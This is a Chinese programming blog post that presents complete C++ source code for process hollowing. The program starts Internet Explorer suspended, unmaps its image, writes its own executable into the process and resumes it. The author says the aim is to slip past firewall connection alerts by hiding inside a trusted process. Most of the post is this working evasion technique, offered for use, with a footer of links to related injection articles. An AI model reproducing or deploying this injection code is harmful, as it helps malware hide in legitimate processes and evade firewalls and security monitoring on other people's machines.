进程注入 1

最新推荐文章于 2018-12-04 22:39:16 发布
最新推荐文章于 2018-12-04 22:39:16 发布
阅读量1k 收藏 1
点赞数
分类专栏: 网络程序防火墙 应用程序-usermode 文章标签: null path image exe header 防火墙
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Blue_Dream_/article/details/1928617
版权

这段代码启动 iexplorer.exe 进程,将本身 EXE 的 image 数据写入 iexplorer.exe 地址空间中. 可能出现的问题是 如果本身 EXE 加载了其它 DLL 那么将会应为库缺失而执行出错.  应该是本身 EXE 的引用API 全部用 LoadLibrary,GetProcAddress 来得到。系统只会为每个 Image File 默认加载几个系统 DLL, 例如 kernel32.dll.

配合 sock 可以绕过防火墙的连接警报。

// Inject.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include <windows.h>


#pragma comment(lib,"ntdll.lib")


typedef long NTSTATUS;


extern "C"
{
  NTSYSAPI
  NTSTATUS 
  NTAPI 
  ZwUnmapViewOfSection(  HANDLE ProcessHandle,  PVOID BaseAddress  );

}

typedef struct _ChildProcessInfo
{
 DWORD dwBaseAddress;
 DWORD dwReserve;

} CHILDPROCESS, *PCHILDPROCESS;


BOOL  FindIePath( char *IePath, int *dwBuffSize );
 
BOOL InjectProcess(void);

DWORD GetSelfImageSize( HMODULE hModule );

BOOL  CreateInjectProcess(  PPROCESS_INFORMATION pi,
                            PCONTEXT  pThreadCxt,
                            CHILDPROCESS  *pChildProcess );

char szIePath[MAX_PATH];

int main(void)
{
 if (InjectProcess() )
 {  
  printf("This is my a test code,made by FISH./r/n");
 
 } else
 {  
  MessageBox(NULL,"进程插入完成","Text",MB_OK);
 }

 return 0;
}

BOOL  FindIePath( char *IePath, int *dwBuffSize )
{
 char szSystemDir[MAX_PATH];
 
 GetSystemDirectory(szSystemDir,MAX_PATH);
 
 szSystemDir[2] = '/0' ;
 lstrcat(szSystemDir,"//Program Files//Internet Explorer//iexplore.exe");
 
 lstrcpy(IePath, szSystemDir);
 
 return TRUE;
}


BOOL InjectProcess(void)
{
 char      szModulePath[MAX_PATH];
 DWORD      dwImageSize = 0;
 
 STARTUPINFO    si = {0};
 PROCESS_INFORMATION  pi;
 CONTEXT     ThreadCxt;
 DWORD      *PPEB;
 DWORD      dwWrite = 0;
 CHILDPROCESS    stChildProcess;
 LPVOID      lpVirtual = NULL;
 PIMAGE_DOS_HEADER   pDosheader = NULL;
 PIMAGE_NT_HEADERS   pVirPeHead = NULL;
 
 HMODULE     hModule = NULL;
 
 ZeroMemory( szModulePath, MAX_PATH );
 ZeroMemory( szIePath, MAX_PATH );
 
 GetModuleFileName( NULL, szModulePath, MAX_PATH );
 FindIePath( szIePath, NULL );
 
 if ( lstrcmpiA( szIePath, szModulePath ) == 0 )
 {  

  MessageBox (NULL, "当前执行代码的进程是 IEXPLORER.EXE", "已经被注入", MB_OK );

  return FALSE;
 }
 
 hModule = GetModuleHandle( NULL );
 if ( hModule == NULL )
 {  
  return FALSE;
 }
 
 pDosheader = (PIMAGE_DOS_HEADER)hModule;
 pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);
 
 dwImageSize = GetSelfImageSize(hModule);
 
 //
 // 以挂起模式启动一个傀儡进程,这里为了传透防火墙,使用IE进程
 //
 
 if ( CreateInjectProcess( &pi,  &ThreadCxt , &stChildProcess ) )
 {
  printf("CHILD PID: [%d]/r/n",pi.dwProcessId);
  //
  // 卸载需要注入进程中的代码
  //
  if ( ZwUnmapViewOfSection(  pi.hProcess,  (LPVOID)stChildProcess.dwBaseAddress ) == 0 )
  {
   //
   // 重新分配内存
   //
   lpVirtual = VirtualAllocEx(  pi.hProcess,  (LPVOID)hModule,  dwImageSize,  MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE  );
   if ( lpVirtual )
   {

    printf("Unmapped and Allocated Mem Success./r/n");
   }
 
  } else
  {
   printf("ZwUnmapViewOfSection() failed./r/n");
   return TRUE;
  }
 
  if ( lpVirtual )
  {
   PPEB = (DWORD *)ThreadCxt.Ebx;   
   //
   // 重写装载地址
   
   WriteProcessMemory(  pi.hProcess,  &PPEB[2],  &lpVirtual,  sizeof(DWORD),  &dwWrite  );
   //
   // 写入自己进程的代码到目标进程
   //
   if ( WriteProcessMemory(  pi.hProcess,  lpVirtual,  hModule,  dwImageSize,  &dwWrite) )
   {
    printf("image inject into process success./r/n");
  
    ThreadCxt.ContextFlags = CONTEXT_FULL;
    if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress )
    {
     ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
    } else
    {
     ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
    }
  
  #ifdef DEBUG
    printf("EAX = [0x%08x]/r/n",ThreadCxt.Eax);
    printf("EBX = [0x%08x]/r/n",ThreadCxt.Ebx);
    printf("ECX = [0x%08x]/r/n",ThreadCxt.Ecx);
    printf("EDX = [0x%08x]/r/n",ThreadCxt.Edx);
    printf("EIP = [0x%08x]/r/n",ThreadCxt.Eip);
  #endif
  
    SetThreadContext(pi.hThread, &ThreadCxt);
    ResumeThread(pi.hThread);
  
   } else
   {
    printf("WirteMemory Failed,code:%d/r/n",GetLastError());
    TerminateProcess(pi.hProcess, 0);
   }
  
  } else
  {
   printf("VirtualMemory Failed,code:%d/r/n",GetLastError());
   TerminateProcess(pi.hProcess, 0);
  }
 }
 
 return TRUE;
}

DWORD GetSelfImageSize( HMODULE hModule )
{
 DWORD dwImageSize;

 _asm
 {
  mov ecx,0x30
  mov eax, fs:[ecx]
  mov eax, [eax + 0x0c]
  mov esi, [eax + 0x0c]
  add esi,0x20
  lodsd
  mov dwImageSize,eax
 }

 return dwImageSize;
}

BOOL  CreateInjectProcess(  PPROCESS_INFORMATION pi,
       PCONTEXT   pThreadCxt,
       CHILDPROCESS  *pChildProcess
       )

{
 STARTUPINFO si = {0};
 
 DWORD   *PPEB;
 DWORD   read;

 // 使用挂起模式启动 IE
 if( CreateProcess(  NULL,
      szIePath,
      NULL,
      NULL, 
      0, 
      CREATE_SUSPENDED,
      NULL, 
      NULL,
      &si,
      pi ) )
 {
  pThreadCxt->ContextFlags = CONTEXT_FULL;
  GetThreadContext(pi->hThread, pThreadCxt);
  
  PPEB = (DWORD *)pThreadCxt->Ebx;
  
  // 得到ie的装载基地址
  ReadProcessMemory(  pi->hProcess,  &PPEB[2],  (LPVOID)&(pChildProcess->dwBaseAddress),
       sizeof(DWORD),
       &read  );

  return TRUE ;

 }

 return FALSE;
}

Blue_Dream_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
进程注入器,dll注入
08-30
进程注入和DLL注入是计算机安全领域中的技术,主要用于软件调试、功能增强以及恶意软件的渗透测试。这些技术涉及操作系统的核心层面,尤其是进程管理和动态链接库(DLL)的加载机制。 DLL注入是一种技术,通过将一...
你真的了解进程注入吗?
最新发布
weixin_65550121的博客
12-13 1531
这里的第一个参数还是跟上面一样进程的句柄,第二个参数设置为nullptr,第三个参数就是shellcode的大小,第四个参数表示指向一个应用程序定义的函数的指针,这个参数的类型为 LPTHREAD_START_ROUTINE,这里的第一个参数就是我们进程的句柄,第二个参数就是我们使用VirtualAllocEx申请的地址,第三个参数就是shellcode,第四个参数表示shellcode的大小,最后一个参数就是写入字节数的输出参数。对于要运行的进程,它必须有一个正在运行的线程,该线程是运行代码的组件。
十种进程注入技术介绍:常见注入技术及趋势调查
Fly_鹏程万里
12-04 1568
前言 进程注入是一种广泛使用的躲避检测的技术,通常用于恶意软件或者无文件技术。其需要在另一个进程的地址空间内运行特制代码,进程注入改善了不可见性,同时一些技术也实现了持久性。尽管目前有许多进程注入技术,但在这篇文章中,我将会介绍十种在野发现的,在另一个程序的地址空间执行恶意代码的进程注入技术,并提供这些技术应用的截图,以便于逆向工程和恶意软件分析,然后协助检测并防御这些进程注入技术。 一、...
10种常见的进程注入技术的总结
热门推荐
qing666888的专栏
09-21 1万+
译者:myswsun 预估稿费:300RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 0x00 前言 进程注入是一种广泛应用于恶意软件和无文件攻击中的逃避技术,这意味着可以将自定义代码运行在另一个进程的地址空间内。进程注入提高了隐蔽性,也实现了持久化。尽管有非常多的进程注入技术,但是本文我只列举了10种常见的技术。我还提供了这些
初探进程注入
安全杂货铺
02-11 2232
十种进程注入技术研究 翻译自:https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process 简介 进程注入是一类各种恶意软件广泛使用的反检测技术,主要功能是在另一个进程的地址空间内运行自定义的代码。进...
Android 进程注入
11-07
1. **权限获取**:进行进程注入前,需要在AndroidManifest.xml中声明相应的权限,如`android.permission.INJECT_EVENTS`用于模拟用户输入,`android.permission.WRITE_EXTERNAL_STORAGE`用于读写文件。此外,还需要...
第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
本文以“第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1”为主题,探讨了四种不同的提权策略,分别是通过数据库应用提权、Redis数据库权限提升、PostgreSQL数据库权限提升以及Windows系统的令牌窃取和进程注入...
进程注入小工具(附源码)
03-07
进程注入是一种在计算机科学中,特别是软件开发和逆向工程领域的技术,主要用于改变或扩展另一个正在运行的进程的行为。在Windows操作系统中,这种技术通常涉及将动态链接库(DLL)加载到目标进程中,使得DLL中的...
VC++进程注入
10-19
**VC++进程注入详解** 进程注入是Windows编程中一种高级技术,主要用于在目标进程中加载自定义的动态链接库(DLL),以实现对目标进程的控制或扩展其功能。在这个主题中,我们将深入探讨如何使用VC++实现进程注入,...
process-inject:在Windows环境下的进程注入方法:远程线程注入,创建进程挂起注入,反射注入,APCInject,SetWindowHookEX注入
01-30
process-inject:在Windows环境下的进程注入方法:远程线程注入,创建进程挂起注入,反射注入,APCInject,SetWindowHookEX注入
获取LoadLibrary函数的代码
04-03 1871
pushad//获取kernel32.dll的基址mov eax, fs:0x30 //PEB的地址mov eax, [eax + 0x0c]mov esi, [eax + 0x1c]lodsdmov eax, [eax + 0x08] //eax就是kernel32.dll的基址mov edi, eax        //同时保存kernel32.dll的基址到edimov ebp, eaxmo
ProcessInject(dll)
weixin_33798152的博客
10-20 259
原理:通过以挂起的方式创建进程对其注入。 #include <stdio.h> #include <stdlib.h> #include <windows.h> #include<tchar.h> typedef struct Param { DWORD year; DWORD Month; DWORD Day; F...
进程注入的三种方法
benny5609的专栏
09-13 3248
一般来说,这个问题有三种可能的解决方案:  1. 把你的代码放到一个DLL中;然后用 windows 钩子把它映射到远程进程。  2. 把你的代码放到一个DLL中;然后用 CreateRemoteThread 和 LoadLibrary 把它映射到远程进程。  3. 不用DLL,直接复制你的代码到远程进程(使用WriteProcessMemory)并且用CreateRemoteThread执行之。
十种流行进程注入技术详细分析
weixin_34050389的博客
09-13 1050
本文讲的是十种流行进程注入技术详细分析, 前言 流程注入是一种恶意软件和无文件间谍攻击中使用的最为广泛的漏洞攻击技术,而且在攻击时还需要在另一个进程的地址空间内运行自定义代码。过程注入除了提高了攻击的隐蔽性之外,也实现了持久性攻击。尽管目前有许多流程注入技术,但在本文中,我只介绍十种在野外看到的能够运用另一个进程运行恶意代码的技术。在介绍的同时,我还会...
进程注入方法总结
HelloKandy's Blog
08-31 1494
对内存中的某个进程进行操作,并且获得该进程地址空间里的数据,或者修改进程的私有数据结构,必须将自己的代码放在目标进程的地址空间里运行,这时就避免不了使用进程注入方法了。进程注入的方法分类如下: 【带DLL的注入】          利用注册表注入          利用Windows Hooks注入          利用远程线程注入          利用特洛伊DLL注入 【不带
直接将自身代码注入傀儡进程
sevenpic的专栏
09-13 7648
<br />EXE注入-傀儡进程2008-08-16 16:38<br />      直接将自身代码注入傀儡进程,不需要DLL。首先用CreateProcess来创建一个挂起的IE进程,创建时候就把它挂起。然后得到它的装载基址,使用函数ZwUnmapViewOfSection来卸载这个这个基址内存空间的数据,。再用VirtualAllocEx来个ie进程重新分配内存空间,大小为要注入程序的大小(就是自身的imagesize)。使用WriteProcessMemory重新写IE进程的基址,就是刚才分配的内存
恶意软件隐蔽技术:进程注入与反取证
"Nick Harbour的‘进程注入的pdf’深入探讨了恶意软件的隐蔽技术和反取证策略,重点关注了进程注入、内存执行代码等方法。这份资料适合对IT安全有兴趣的开发者,尤其是关注C++、VC++和MSDN的读者。" 在计算机安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Blue_Dream_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值